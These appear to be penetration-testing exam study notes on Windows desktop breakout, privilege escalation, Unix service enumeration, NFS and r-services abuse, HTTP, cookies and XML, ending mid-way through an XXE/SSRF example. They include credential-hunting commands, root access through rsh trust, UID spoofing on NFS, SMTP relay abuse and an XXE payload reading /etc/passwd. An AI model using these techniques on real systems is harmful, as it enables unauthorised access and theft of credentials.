- 35. Derive list of missing security patches – MBSA. Knowledge of common windows patch management strategies: SMS - Microsoft Systems Management Server (SMS) 2003 provides a feature-rich management and servicing solution. You can use SMS 2003 or System Center Configuration Manager 2007 (ConfigMgr) to manage networked Windows Embedded Standard-based devices alongside Windows desktop, Windows Server, and other Windows Mobile systems. SUS - Microsoft SUS is a free patch management tool provided by Microsoft to help network administrators deploy security patches more easily. In simple terms, Microsoft SUS is a version of Windows Update that you can run on your network. Instead of each workstation having to connect to the Internet to update Windows, each workstation connects to the Microsoft SUS Server instead and updates from there. WSUS - Windows Server Update Services (WSUS) enables information technology administrators to deploy the latest Microsoft product updates. MBSA - Microsoft Baseline Security Analyzer (MBSA) - The MBSA can help you stay on top of regular network auditing tasks by scanning both local and remote Microsoft systems for common security misconfigurations. It can also identify missing security updates and service packs available through the various Microsoft Update technologies, helping to ensure all machines are patched correctly. E7 - Desktop Lockdown Knowledge and understanding of techniques to break out of a locked down Windows desktop / Citrix environment. Source Dialog Boxes – Notepad, File > Save As; Print – will give access to drives which can be used as pivot to create new files (batch, shortcuts), open new Windows Explorer instances, Exploring Context Menu’s (Open File Location). Help Menus – Similar to above, but some may have click here to open Command Prompt, or use URL link to open up IE from which you can pivot (see below) Environmental Variables / Bypassing Path Restrictions – Use variable as opposed to location, i.e. %SYSTEMROOT% as opposed to c:windowssystem32 IE - File protocol handlers (about:, file:, mailto:), UNC paths 127.0.0.1c$WindowsSystem32. Address Bar, Menus, Right Click in site, Set homepage to cmd.exe, F12 Developer Tools Getting Command Prompt – is Run available, try Windows+R. Browse to it, right click and open, Drag and Drop and invalid extension onto executable – set custom app to view source, so set to cmd.exe, Import Certificate (abusing Dialog Boxes) Microsoft Office applications by using the CTRL+Click option. file:///c:/Windows/System32/cmd.exe. It is trivial to use msfencode/msfpayload to generate VBA code that will create a reverse shell / Meterpreter shell on the host. VBA can be used to open CMD. MS SQL – xp_cmdshell Task Manager – File > New Task (Run) Task Scheduler, MSPAINT, FTP – lcd/!dir Run32 - There is a vast array of commands that can be run via Rundll32. Date and Time Properties: RunDll32.exe shell32.dll,Control_RunDLL timedate.cpl Shortcuts - Standard shortcuts exist which may be useful. WINDOWS+E – Launch Windows Explorer, WINDOWS+R – Run, F3 – Search, CTRL+O – Open File, CTRL+S – Save, CTRL+N – New Batch Files and Scripts - Batch files such as .BAT and .CMD can be an alternative for executing system commands when an interactive shell isn’t permitted. Whilst .BAT files can be disabled, the lesser known .CMD equivalent can sometimes be allowed. Windows Script Hosts (WSH): Can create a .vbs file to launch a CMD shell. ICA Files – Modify ICA file so that InitialProgram=cmd.exe
- 36. Citrix – Email, Clipboard. Cached connection information may be available in local application data stores. Look for the “ICAClient” directory, which is usually found within the %APPDATA% folder. Using “dir /s ICAClient” from a command line will also work. By copying another user’s ICAClient contents into your own folder, it may be possible to hijack their stored connections. Citrix Shortcuts - SHIFT+F1 – Displays Windows Task List, As per privilege escalation - Binary Planting, DLL Hijacking Privilege escalation techniques. Depends on from what and to what – example from admin to system? Admin to Domain Admin, User to Admin Clear Text Credentials in Files – Install and Config files – unattended.txt, sysprep.inf, sysprep.xml, vnc.ini, cached FTP, findstr /si password *.txt *.xml *.ini Passwords in Registry – Autologin, SNMP, Putty Directory Permissions – Incorrect Permissions often in Program Files for processes running as System Default permissions on newly created files. Autoruns – Sysinternals tool will highlight start-up executable locations – can trojan these files if the binary cannot be overwritten directory. DLLs - However, can still add data to that directory such as DLL which may get executed as part of binary (looks in same folder first, then system32). Process Monitor to trace. Scheduled Tasks – AT command - Only admin can view, but normal user can view what tasks are running. Services – Orphaned Installs, hijack them – Autoruns tools from Sysinternals. Token Impersonation Impersonate Named Pipe Internet Explorer Java Escalation E8 - Exchange Knowledge of common attack vectors for Microsoft Exchange Server. OWA Choose Your Certificates Carefully Utilize the Power of Edge Transport Server Keep Administrative Access Internal E9 - Common Windows Applications Knowledge of significant vulnerabilities in common windows applications for which there is public exploit code available. MS17-010 – Eternal Blue
- 37. Appendix F: Unix Security Assessment F1 - User enumeration Discovery of valid usernames from network services commonly running by default: Rusers – RPC service endpoint that listens on dynamic ports. If TCP/UDP 111 open the rpcinfo client can check for presence of rusersd: rpcinfo -p 192.168.0.10 program vers proto port service 1100002 3 tcp 33180 rusersd Once found, use ruser to retrieve list of logged in users. $ rusers -l 192.168.0.50 Rwho – UDP 513 – rwho 192.168.189.120 – will list current logged in users. SMTP – Password brute forcing. Valid user account details can be enumerated by issuing smtp, VRFY, or RCPT TO: Telnet host 23 HELO world VRFY test VRFY chris EXPN asks the server for the membership of a mailing list. A VRFY request asks the server to verify an address. The point of a RCPT request is to add one address to the list of envelope recipient addresses, from which I suppose you could check for bounces and deduce live accounts. Finger – TCP 79. Connect direct or via Finger command. Solaris 8 and below, information leak: finger ‘1 2 3 4 5 6 7 8 9 0’@192.168.0.10 or finger 'a b c d e f g h'@target.com Finger works by querying entries in the passwd files, i.e. GECOS fields. Finger can also be used to query "plan" files. Plan files can be created by users to inform others of their current activity, humour or anything else that the user may wish to share. Finger user@192.168.0.10 Finger redirection: finger@192.168.0.10@217.34.17.200 F2 - Unix vulnerabilities Recent or commonly-found Solaris vulnerabilities, and in particular those for which there is exploit code in the public domain. Solaris 10 and 11 impacted by Telnet -f client sequence. The flaw meant that exploitation could occur if an existing user account name was supplied after the “-f” (e.g. bin), and could be conducted through the command line with: telnet -l -f<account> <host> Recent or commonly-found Linux vulnerabilities, and in particular those for which there is exploit code in the public domain. Use of remote exploit code and local exploit code to gain root access to target host Common post-exploitation activities
- 38. exfiltrate password hashes crack password hashes check patch levels derive list of missing security patches reversion to previous state F3 FTP FTP access control You can use the following configuration files in the /etc/ftpd directory to control access to the FTP server. ftpusers is used to list users who are denied access to the FTP server. ftphosts is used to allow or deny login from various hosts to various accounts on the FTP server. ftpaccess is the main FTP configuration file. The FTP server only reads the /etc/ftpd/ftpaccess file if called with the -a option. When the ftpaccess file is used, all users must be members of a class to be allowed access to the FTP server. You can specify many ftpaccess directives that apply only to a particular class. Anonymous access to FTP servers Risks of allowing write access to anonymous users. F4 - Sendmail / SMTP Valid username discovery via EXPN and VRFY iis6
- 39. Note above HELO > MAIL FROM: > RCTP TO: Awareness of recent Send mail vulnerabilities; ability to exploit them if possible Mail relay vulnerability Mail relaying F5 - Network File System (NFS) NFS security: host level (exports restricted to particular hosts) and file level (by UID and GID). The /etc/exports file controls which file systems are exported to remote hosts and specifies options. An alternate way to mount an NFS share (as opposed to using mount command) from another machine is to add a line to the /etc/fstab file. Use of NFSv4 is recommended over other versions of NFS. NFSv4 security mechanisms are oriented towards authenticating individual users, and not client machines as used in NFSv2 and NFSv3. The NFS service is running on port 2049 TCP. The rpcinfo utility can be used to determine if there are any mountd and NFS services running on the host. Access control is not possible for users, other than through file and directory permissions. In other words, once a file system is exported via NFS, any user on any remote host connected to the NFS server can access the shared data. To limit the potential risks, administrators often allow read-only access or squash user permissions to a common user and group ID. Wildcards should be used sparingly when exporting directories via NFS as it is possible for the scope of the wildcard to encompass more systems than intended.
- 40. Mount access is achieved by the client machine attempting to attach to the server. The security for this is provided by the /etc/exports file. This file lists the names or IP addresses for machines that are allowed to access a share point. If the client's ip address matches one of the entries in the access list then it will be allowed to mount. It is also possible to restrict access to the portmap service via TCP wrappers. Access to ports used by portmap, rpc.mountd, and rpc.nfsd can also be limited by creating firewall rules with iptables. The following command will retrieve the list of the exported folders for a given host. If there are any files on the exported share that the user doesn’t have permission to read them then it might be possible to trick the NFS server to believe that the user account that tries to read the file is the owner of the file. This can be achieved by performing UID (User ID) manipulation. Use ls -la to get the current user of the file, then create username of same name. The UID can be changed from the passwd file, then SU as the new user and access the file. Root squashing The default behaviour when exporting a file system via NFS is to use root squashing. This sets the user ID of anyone accessing the NFS share as the root user on their local machine to a value of the server's nfsnobody account. Never turn off root squashing. This prevents someone using local root to change file permissions on the remote share. Since the UID of the file will be the same with the UID of the new user, the system will believe that this is the original owner so it would be possible to read the contents of the file.
- 41. This is due because the exported folder doesn’t have the root_squash option set which will map the UID and GID of the user that is accessing the NFS folder to anonymous UID/GID. For example, the root user ID of a host that is trying to access a share will be replaced by the user ID nobody on the NFS server to prevent escalation of privileges. The root_squash option can be enabled or disabled from the following location: vi /etc/exports Nosuid and Noexec options. Can be used in /etc/fstab noexec — Prevents execution of binaries on mounted file systems. This is useful if the system is mounting a non- Linux file system via NFS containing incompatible binaries. nosuid — Disables set-user-identifier or set-group-identifier bits. This prevents remote users from gaining higher privileges by running a setuid program. File access through UID and GID manipulation. Mount the remote filesystem, ls -la what you want to know. Unmount the filesystem, create the group and such locally, su to that user, remount the filesystem, and you have access to all the things If the passwd file has write permissions then by changing the UID of a non-privileged user to 0 will give him root level access. The UID of the username service has been modified to 0 which is the UID of the root user to demonstrate this issue. F6 - R* services Berkeley r* service: access control (/etc/hosts.equiv and .rhosts) – ./rhosts is local to user profile as its in user home directory. /etc/hosts.equiv is system-wide and applies to everyone, while .rhosts is specific to the user (and is stored in their home directory). trust relationships When user connects, the IP address is cross referenced against .rhosts, and username is verified, but no password is needed. rusers is part of RPC servers (TCP 111), if found running rusers -l hostname exec – TCP 512 (rexec – needs username -l and password -p) login – TCP 513 (rlogin – needs username -l) rwho – UDP 513 – Accessed by issuing rwho host shell – TCP 514 (rsh – needs login -l) Impact of poorly-configured trust relationships. Depending on the files that are stored in the exported folder it might be possible to obtain shell access via SSH or RSH and Rlogin. Interesting files to examine are: authorized_keys and rhosts
- 42. Both files are hidden therefore from the NFS folder issue a ls -la. The .rhosts clarifies which remotes hosts or users can access a local account on the system. If the contents of the .rhosts file are the ++ sign this means that it allows connections from any host on the network and from any username. The following commands will allow the root user of the system to connect on the target directly as the system will not prompt for a password since all the users are trusted from all systems. rsh -l root IP rlogin -l root IP F7 - X11 X Windows security and configuration; host-based vs. user-based access control. X servers listen on TCP ports 6000+ (depending number of concurrent displays). DISPLAY variable is basically 3 components: <host>:<display>[.<screen>] When DISPLAY is set to host:4, short for tcp/host:4, clients use TCP to connect to the server. The TCP port is then 6000 plus the display number (in that case 6004). When I request X forwarding from SSH server, then SSH server sets a $DISPLAY variable with value localhost:10.0. In addition, it starts to listen on 127.0.0.1 port 6010 Xorg listens on port 6000+n, where n is the display number. Xwd allows you to take screenshots of the display. Xhost Authentication Access based on host - The host-based access method consists in specifying a set of hosts that are authorized to connect to the X display server. Xhost command is used with + - to allow and deny X access from individual hosts. The xhost command uses the "/etc/XD.hosts" files that contain the X server authentication information Xauth Authentication The Xauth command is in charge of managing the $HOME/.Xauthority file that keeps the authentication information. This file contains one cookie for each X display the user can use. F8 - RPC services RPC service enumeration The RPC portmapper is a server that converts RPC program numbers into TCP/IP (or UDP/IP) protocol port numbers. Several interesting Unix daemons, such as Network Information Service+, Network File System, and Common Desktop Environment, run as RPC services on dynamically assigned high ports. The portmapper service (aka rpcbind) runs on port TCP/UDP 111 or 32771 and can be queried using rpcinfo to discover the available services and their port number. The Nmap documentation states that if portmapper is filtered, services can be identified directly using a Nmap scan of high port ranges (TCP/UDP 32771-34000). RPC Grinding scan is done as part of an aggressive scan (-A) or can be called explicitly with -sR. # rpcinfo -p 192.168.0.50 (not -l) In networks protected by firewalls and other mechanisms, access to the RPC portmapper service running on port 111
- 43. is often filtered. Therefore, determined attackers can scan high port ranges (UDP and TCP ports 32771 through 34000 on Solaris hosts) to identify RPC services that are open to direct attack. You can run Nmap with the -sR option to identify RPC services listening on high ports if the portmapper is inaccessible. Common RPC services # rpcinfo -p 192.168.0.50 program vers proto port service 100000 4 tcp 111 rpcbind 100000 4 udp 111 rpcbind 100024 1 udp 32772 status 100024 1 tcp 32771 status 100021 4 udp 4045 nlockmgr 100021 2 tcp 4045 nlockmgr 100005 1 udp 32781 mountd 100005 1 tcp 32776 mountd 100003 2 udp 2049 nfs 100011 1 udp 32822 rquotad 100002 2 udp 32823 rusersd 100002 3 tcp 33180 rusersd Sprayd - rpc.sprayd is a server that records the packets sent by spray. Spray sends a one-way stream of packets to host using RPC, and reports how many were received, as well as the transfer rate. The host argument can be either a name or an Internet address. Other RPC services: walld, ypbind (ypbind finds the server for NIS domains and maintains the NIS binding information), status, nlockmgr, rquotad, Recent or commonly-found RPC service vulnerabilities. F9 - SSH Dsiff v2.3 contains a tool called sshmitm which is used to conduct MITM attacks on SSH1. The tool exploits a vulnerability in the host key authentication phase. SSH2 is not susceptible to sshmitm. SSH2 prevents MITM by server-host authentication (private keys), and stronger authentication for the client (public keys). SSHv1 was found to have a remote integer overflow vulnerability that allowed hackers to run code with root access. Versions 1 and 2 of the SSH protocol SSHv1 and SSHv2 will not talk to each other as the entire code was re-written (except for SSH v1.99). SSH servers that advertise themselves as 1.99 (e.g. SSH-1.99-OpenSSH_4.1) are really SSH-2 servers that are configured to fall back to using SSH-1 if requested. However, if SSH 1.99 is reported, then both SSH 1.5 and SSH 2.0 are supported. SSH version 1.99 is merely an indication that the server supports both SSH version 2 *and* SSH version 1. SSH2 added a number of new features to provide a stronger, more comprehensive product. These features include: Encryption ciphers, such as 3DES and AES. The use of sound cryptographic Message Authentication Code (MAC) algorithms for integrity checking. Support for public key certificates. Identify the types and versions of SSH software in use ssh -V localhost or 127.0.0.1 -V' Display the version number and exit. Authentication mechanisms within SSH
- 44. Public/private key pairs for authentication - Generating an SSH key pair and adding the public key into the list of authorized keys will allow a user to connect via SSH on the NFS server. Passwords
- 45. Appendix G: Web Technologies G1 - Web Server Operation How a web server functions in terms of the client/server architecture. Concepts of virtual hosting and web proxies. G2 - Web Servers & their Flaws Common web servers and their fundamental differences and vulnerabilities associated with them: IIS IIS 5.0 shipped with Windows 2000, IIS6 shipped with Windows 2003, IIS7 shipped with 2008. ISAPI filters are DLL files that can be used to modify and enhance the functionality provided by IIS. ISAPI filters always run on an IIS server, filtering every request until they find one they need to process. The ability to examine and modify both incoming and outgoing streams of data makes ISAPI filters powerful and flexible. Apache (and variants) The Apache 2.0.x Win32 installation is shipped with a default script, /cgi-bin/test-cgi.bat, that allows an attacker to execute commands on the Apache server (although it is reported that any .bat file could open this vulnerability.) An attacker can send a pipe character with commands appended as parameters, which are then executed by Apache. The mod_userdir module allows each user account on the server to have a personal website in the home directory, accessible via a <server URL>/~username alias. Apache returns error 404 when a user account, whose personal site is requested, doesn’t exist; and it returns error 403 when a website is not found in that user’s home folder. The errors generated expose valid user account names on the server. Apache Chunk Handling – impacts Apache 1.3.23 (FreeBSD), 1.3.20 and 1.3.23, 24 (OpenBSD), Apache 1.3.12, 1.3.20, 1.3.22-24 (NetBSD) – Apache-Nosejob exploit script released. Other Web Application Servers IBM WebSphere Application Server Oracle WebLogic Server is a Java EE application server Apple WebObjects G3 - Web Enterprise Architectures Design of tiered architectures. Web applications are designed across three layers: Presentation tier Application tier Data tier The concepts of logical and physical separation. Differences between presentation, application and database layers. Multi-layered architecture is a client–server architecture in which presentation, application processing, and data management functions are physically separated. The most widespread use of multitier architecture is the three-tier architecture.
- 46. G4 - Web Protocols HTTP, HTTPS HTTP Connect telnet www.example.org 80 Trying 192.168.0.14… Connected to 192.168.0.14. Escape Character is ‘^]’, CONNECT maila.microsoft.com:25 HTTP/1.0 HTTP/1.0 200 Connection established 220 inet-imc-02.redmond.corp.microsoft.com Microsoft.com ESTMP Server Note the two carriage returns above. Status 200 shows OK to connection. A failed connection will display 405 Method Not Allowed, or diversion to a generic web page. Can also use HTTP POST, in which case you specify http in connection attempt: POST http://mail.microsoft.com:25 /HTTP/1.0 HTTP GET can be used along with HOST header: telnet www.example.org 80 Trying 192.168.0.14… Connected to 192.168.0.14. Escape Character is ‘^]’, GET / HTTP/1.1 HOST: mx4.sun.com:25 HELO . MAIL FROM: spammer@alter.net RCPT TO: targtet@unsuspecting.com DATA Subject: Look Ma! . HTTP Methods HTTP 1.0 GET POST - Although the URL can still be bookmarked, any parameters sent in the message body will be excluded from the bookmark. These parameters will also be excluded from the various locations in which logs of URLs are maintained and from the Referer header. HEAD - Functions in the same way as a GET request, except that the server should not return a message body in its response. The server should return the same headers that it would have returned to the corresponding GET request. HTTP 1.1 OPTIONS - asks the server to report the HTTP methods that are available for a particular resource. PUT DELETE CONNECT - used by proxy servers. Can be abused to establish connections with arbitrary hosts. TRACE - designed for diagnostic purposes. The server should return in the response body the exact contents of the request message it received. This can be used to detect the effect of any proxy servers between the client and server that may manipulate the request.
- 47. WebDAV: PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, UNLOCK HTTP Header The Pragma header instructs the browser not to store the response in its cache. The Expires header indicates that the response content expired in the past and therefore should not be cached. These instructions are frequently issued when dynamic content is being returned to ensure that browsers obtain a fresh version of this content on subsequent occasions. Pragma is the HTTP/1.0 implementation and cache-control is the HTTP/1.1 implementation of the same concept. They both are meant to prevent the client (i.e. the browser and not a proxy) from caching the response. Older clients may not support HTTP/1.1 which is why that header is still in use. <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Cache-Control" content="no-store" /> (Exam tries to confuse with No Cache) HTTP Authentication Basic is a simple authentication mechanism that sends user credentials as a Base64-encoded string in a request header with each message. NTLM is a challenge-response mechanism and uses a version of the Windows NTLM protocol. Digest is a challenge-response mechanism and uses MD5 checksums of a nonce with the user’s credentials. All HTTP web methods and response codes. GET, POST, PUT, DELETE, OPTIONS, TRACE, HEAD, CONNECT 1xx Informational responses 100 Continue 101 Switching Protocols 102 Processing 103 Early Hints 2xx Success 200 OK 201 Created
- 48. 202 Accepted 203 Non-Authoritative Information (since HTTP/1.1) 204 No Content 205 Reset Content 206 Partial Content (RFC 7233) 207 Multi-Status (WebDAV; RFC 4918) 208 Already Reported (WebDAV; RFC 5842) 226 IM Used (RFC 3229) 3xx Redirection 300 Multiple Choices 301 Moved Permanently - Resource requested has been definitively moved to the URL given by the Location headers 302 Found - Temporarily moved to the URL given by the Location header 304 Not Modified (RFC 7232) 306 Switch Proxy 307 Temporary Redirect (since HTTP/1.1) 308 Permanent Redirect (RFC 7538) 4xx Client errors 400 Bad Request 401 Unauthorized - Similar to 403 Forbidden, but specifically for use when authentication is required and has failed or has not yet been provided. 402 Payment Required - Reserved for future use 403 Forbidden 404 Not Found 405 Method Not Allowed 406 Not Acceptable 407 Proxy Authentication Required 408 Request Timeout 409 Conflict 410 Gone 5xx Server errors 500 Internal Server Error 501 Not Implemented 502 Bad Gateway 503 Service Unavailable 504 Gateway Timeout 505 HTTP Version Not Supported 506 Variant Also Negotiates (RFC 2295) 507 Insufficient Storage (WebDAV; RFC 4918) 508 Loop Detected (WebDAV; RFC 5842) 510 Not Extended (RFC 2774) 511 Network Authentication Required (RFC 6585) HTTP Header Fields relating to security features X-Frame-Options - This header gives instructions to the browser if and when a page should be displayed as part of another page (i.e. in an IFRAME). Allowing a page to be loaded inside an IFRAME opens up the risk of a so-called Clickjacking attack. The X-Frame-Options can be used with the following options: DENY,
- 49. SAMEORIGIN, ALLOW-FROM (is your desired URI, including protocol handler). Unless your application explicitly requires to be loaded inside an IFRAME you should set the header to deny. Strict-Transport-Security - This header, often abbreviated as HSTS (HTTP Strict Transport Security), tells the browser to enforce an HTTPS connection whenever a user tries to reach the site sending this header. All major browsers support this feature and should: Only connect to the site via HTTPS, convert all HTTP references on the site (e.g. JavaScript includes) to HTTPS and Refuse to load the website in case of errors with the SSL certificate (e.g. Certificate expired, broken certificate chain, …). It is important to note that as this header can only be set via an HTTPS response, the user therefore needs to connect to the site at least once via HTTPS. As the HSTS HTTP Header is only recognized when sent over an HTTPS connection, websites can still allow users to interact with the website using HTTP, to allow compatibility with non-HTTPS user agents. X-XSS-Protection - The purpose of this header is to instruct the web browser to utilize its Cross-Site Scripting protection. X-Content-Type-Options – The nosniff directive forces the browser to render the content in accordance of the content-type header, and thereby stops the browser from performing content-sniffing to guess at the type of content returned from web server. Content-Security-Policy – The CSP is sent from the server to stipulate the location where scripts can be loaded. It also stipulates the restrictions on those scripts, for example whether the eval() JS function can be used. The Content-Security-Policy (short CSP) is a flexible approach to specify which content in a site may be executed and which not. One of the current problems is that the web browser does not know which sources to trust and which not to trust, e.g. is a third-party JavaScript include from apis.google.com good or bad? The only proper solution to this is source whitelisting, where the developer specifies legitimate resource locations. To enable CSP, you need to configure your web server to return the Content-Security-Policy HTTP header (sometimes you will see mentions of the X-Content-Security-Policy header, but that's an older version and you don't need to specify it anymore). Alternatively, the <meta> element can be used to configure a policy, for example: <meta http-equiv="Content-Security-Policy" content="default-src 'self'; img-src https://*; child-src 'none';"> A primary goal of CSP is to mitigate and report XSS attacks. XSS attacks exploit the browser's trust of the content received from the server. Malicious scripts are executed by the victim's browser because the browser trusts the source of the content, even when it's not coming from where it seems to be coming from. CSP makes it possible for server administrators to reduce or eliminate the vectors by which XSS can occur by specifying the domains that the browser should consider to be valid sources of executable scripts. A CSP compatible browser will then only execute scripts loaded in source files received from those whitelisted domains, ignoring all other script (including inline scripts and event-handling HTML attributes). Example: A web site administrator wants to allow users of a web application to include images from any origin in their own content, but to restrict audio or video media to trusted providers, and all scripts only to a specific server that hosts trusted code. Content-Security-Policy: default-src 'self'; img-src *; media-src media1.com media2.com; script-src userscripts.example.com CORS – (Cross Origin Resource Sharing) CORS allows cross-domain HTTP data exchange, which means a page running at origin A can send/receive data from a server at origin B. CORS is abundantly used in web applications where web fonts,
- 50. CSS, documents, and so on are loaded from different origins, which may not be of the origin where the resources are actually stored. URL with Session Data URL Authenticated Links: This approach is generally only used without authentication for things like password resets. The unguessable link typically expires within a short period of time, and can only be used by someone already semi- authenticated (i.e. the website already knows the email address to which the link was sent) Even though developers use the "HttpOnly" session cookie, the above-mentioned leakages of session ID in URL and page body nullify the effectiveness of "HttpOnly" flag. Cookies Set-Cookie Header. Set-Cookie header of the http responses from the web server contains Secure and HttpOnly flags. Expires sets a date until which the cookie is valid. This causes the browser to save the cookie to persistent storage, and it is reused in subsequent browser sessions until the expiration date is reached. If this attribute is not set, the cookie is used only in the current browser session. Expires=<date> - The maximum lifetime of the cookie as an HTTP-date timestamp. If not specified, the cookie will have the lifetime of a session cookie. A session is finished when the client is shut down meaning that session cookies will get removed at that point. If a cookie presents the “Max-Age” (that has preference over “Expires”) or “Expires” attributes, it will be considered a persistent cookie and will be stored on disk by the web browser based until the expiration time. Persistent cookies are stored in a text file on the client’s computer. Non-Persistent cookies are stored in RAM on the client and are destroyed when the browser is closed (also called in-memory cookies). Session cookies are created when you create a session object. epcSession can be created without cookies but that make the URL look crappy. Secure flag forces the browser to transmit cookies (hence different from HSTS which HTTPs entire connection) through an encrypted channel such as HTTPS, which prevents eavesdropping, especially when an HTTPS connection is downgraded to HTTP through tools such as SSLStrip and so on. The syntax for this is as follows: Set-Cookie: Name=Value; expires=Wednesday, 01-May-2014 12:45:10 GMT; Secure In this HTTP header; Secure instructs the browser to transmit a cookie through a secure encrypted channel, thereby encasing the session token in an encrypted barrier. HttpOnly is a flag attached to cookies that instruct the browser not to expose the cookie through client-side scripts (document.cookie and others). It disallows access to the cookie from any scripts. The agenda behind HttpOnly is not to spill out cookies when an XSS vulnerability exists, as an attacker might be able to run their script but the fundamental benefit of having an XSS vulnerability (the ability steal cookies and hijack a currently established session) is lost. HttpOnly cookies were first introduced in Microsoft's Internet Explorer 6 SP1, and as of now, this has become a common practice while setting session cookies. The syntax of this is as follows: Set-Cookie: Name=Value; expires=Wednesday, 01-May-2014 12:45:10 GMT; HttpOnly In this HTTP header; HttpOnly instructs the browser to save the cookie without exposing it to client-side scripts.
- 51. Cookie Domains – Same cookie sent to sub-domains -depends on what cookie scope is set. If server1.microsoft.com set the cookie, the web browser will automatically send the cookie with all subsequent requests to that domain and its sub-domains (admin.server1.microsoft.com). The cookie will not be sent to the parent domain or peer domains (microsoft.com or server2.microsoft.com). This restriction can be over-ridden by a programmer by setting the domain attribute: Set-cookie: cookie1=somedata; domain=microsoft.com; This will ensure that cookies are sent to top-level domain as well as all sub-domains. The site blog.example.com can set cookies with scope blog.example.com or with scope example.com. Cookies with the latter scope will be sent back to secure.example.com, if the user visits secure.example.com. If the site secure.example.com sets a cookie with scope example.com, then the site blog.example.com can overwrite that cookie arbitrarily. Whenever browsers see a cookie with the same name and scope as one that's already in the cookie jar, they discard the old cookie value and overwrite it with the new cookie. Thus, blog.example.com can overwrite any cookie whose scope is example.com. Cookie Path Restrictions – Same cookie for folder and its sub-folders, but not other directories (including not parent). If an application residing at http://microsoft.com/app1/index.jsp sets a cookie, the browser will automatically send this cookie to all requests for pages residing under the /app1/ directory and also any sub-directories. The browser will not include the cookie with request for any other directory on that server, including the parent directory. This restriction can be over-ridden by a programmer by setting the path attribute: Set-cookie: cookie1=somedata; path=/app1/ This will ensure that the cookie will only be sent to the application residing at the /app1/ directory and its sub-directories. If the trailing / is not specified, the browser will send the cookie to all directories that begin with app1. For example, /app1-test/ or /app1-prod/ SOAP You can serve any content over HTTP such as HTML, images, sound, video, etc. SOAP is an XML-based encoding of messages that are typically sent over HTTP. Just like HTTP sits on top of TCP/IP, SOAP sits on top of HTTP. Layers on top of layers... SOAP stands for Simple Object Access protocol. It is XML based used for sending and receiving messages. It is defined with in XML. If you look at a SOAP request, you can see both layers, with the HTTP headers at the top, followed by the SOAP message.
- 52. SOAP has three major characteristics: Extensibility (security and WS-Addressing are among the extensions under development) Neutrality (SOAP can operate over any protocol such as HTTP, SMTP, TCP, UDP, or JMS) Independence (SOAP allows for any programming model) A document type definition (DTD) is a set of mark-up declarations that define a document type for an SGML- family mark-up language (SGML, XML, HTML). A Document Type Definition (DTD) defines the legal building blocks of an XML document. It defines the document structure with a list of legal elements and attributes. After SOAP was first introduced, it became the underlying layer of a more complex set of web services, based on DTD: Web Services Description Language (WSDL) XML schema Universal Description Discovery and Integration (UDDI) Web Services Description Language (WSDL) An XML-based application will have a WSDL file that defines the expected data format and request layout. This file should be accessible. The Web Services Description Language (WSDL) is an XML-based interface definition language that is used for describing the functionality offered by a web service. The acronym is also used for any specific WSDL description of a web service (also referred to as a WSDL file), which provides a machine-readable description of how the service can be called, what parameters it expects, and what data structures it returns. Therefore, its purpose is roughly similar to that of a type signature in a programming language. The current version of WSDL is WSDL 2.0. The meaning of the acronym has changed from version 1.1 where the "D" stood for "Definition". Example WSDL file: <?xml version="1.0" encoding="UTF-8"?> <description xmlns="http://www.w3.org/ns/wsdl" xmlns:tns="http://www.tmsws.com/wsdl20sample" xmlns:whttp="http://schemas.xmlsoap.org/wsdl/http/" xmlns:wsoap="http://schemas.xmlsoap.org/wsdl/soap/" targetNamespace="http://www.tmsws.com/wsdl20sample"> <documentation> This is a sample WSDL 2.0 document. </documentation>
- 53. XML, XML schema and DTD An XML schema is a description of a type of XML document. It tells users to develop their XML in such a schema. Whereas an XML document is a form to communicate with another application or system (often disparate systems) To ensure data is in right structure a DTD (Document Type Definition) can be used. This defines the elements that may be included in your document, what attributes these elements have, and the ordering and nesting of the elements. The critical difference between DTDs and XML Schema is that XML Schema utilize an XML-based syntax, whereas DTDs have a unique syntax held over from SGML DTDs. Although DTDs are often criticized because of this need to learn a new syntax, the syntax itself is quite terse. The opposite is true for XML Schema, which are verbose, but also make use of tags and XML so that authors of XML should find the syntax of XML Schema less intimidating. The DTD is declared in a DOCTYPE declaration beneath the XML declaration contained within an XML document: Inline Definition – where DTD is contained within the XML: <?xml version="1.0"?> <!DOCTYPE documentelement [definition]> External Definition – Inline is handy for a few docs, but external definition reduces overhead by placing DTD on web server: <?xml version="1.0"?> <!DOCTYPE documentelement SYSTEM "documentelement.dtd">
- 54. The lowest level of definition in a DTD is that something is either CDATA or PCDATA: Character Data, or Parsed Character Data. We can only define an element as text, and with this limitation, it is not possible, for example, to force an element to be numeric. Attributes can be forced to a range of defined values, but they can’t be forced to be numeric. XML Schema Definition (XSD) or XML Schemas provide a much more powerful means by which to define your XML document structure and limitations. XML Schemas are themselves XML documents. They reference the XML Schema Namespace and even have their own DTD. XML Schemas provide a set of basic types. These types are much wider ranging than the basic PCDATA and CDATA of DTDs. They include most basic programming types such as integer, byte, string and floating-point numbers, but they also expand into Internet data types such as ISO country and language codes (en-GB for example). XSD defines a schema which is a definition of how an XML document can be structured. You can use it to check that a given XML document is valid and follows the rules you've laid out in the schema. One has to see XSD and create XML in such a way or else it won't communicate with another application or system which has been developed with a different technology. A company in Chicago provides an XSD template for a company in Texas to write or generate their XML in the given XSD format. If the company in Texas failed to adhere with those rules or schema mentioned in XSD then it is impossible to expect correct information from the company in Chicago. WSDL is an XML document that describes a web service. It shows which operations are available and how data should be structured to send to those operations. WSDL may or may not have XSD to validate its structure. WSDL documents have an associated XSD that show what is valid to put in a WSDL document. Example: XSD defines elements for an XML
- 55. ..XML uses it: The below is a WSDL which describes a web service called Book:
- 56. Browser Security SOP - Same-origin policy is a security enforcement found in most common browsers that restricts the way a document or script (or other data) that gets loaded from one origin can communicate and associate with properties of another origin. It's a crucial concept of security which runs web applications of various kinds. Origin is considered the same based on the protocol, hostname port number, of the webpage being the same. Keep in mind that the same-origin policy is not only for JS but for cookies, AJAX, Flash (but not images?), and so on. Data stored inside localStorage is also governed by this policy, that is, origin-separated. G5 - Web Mark-up Languages Web mark-up languages: HTML XML An XML DTD is document which is used to validate an XML document for certain criteria, remember that an XML document may be syntactically correct but may not follow the DTD. It acts as a validating template containing a defining and valid structure, attributes, and elements for a certain XML document. An XXE attack is based on the concept of external entities in XML. We can utilize the URI portion of external entities to do nasty things such as reading files, exfiltration of data, server-side request forgery, or even executing arbitrary code. <!DOCTYPE student [ <!ENTITY oops SYSTEM "file:///etc/passwd"> ]> SSRF <!DOCTYPE student [ <!ENTITY oops SYSTEM 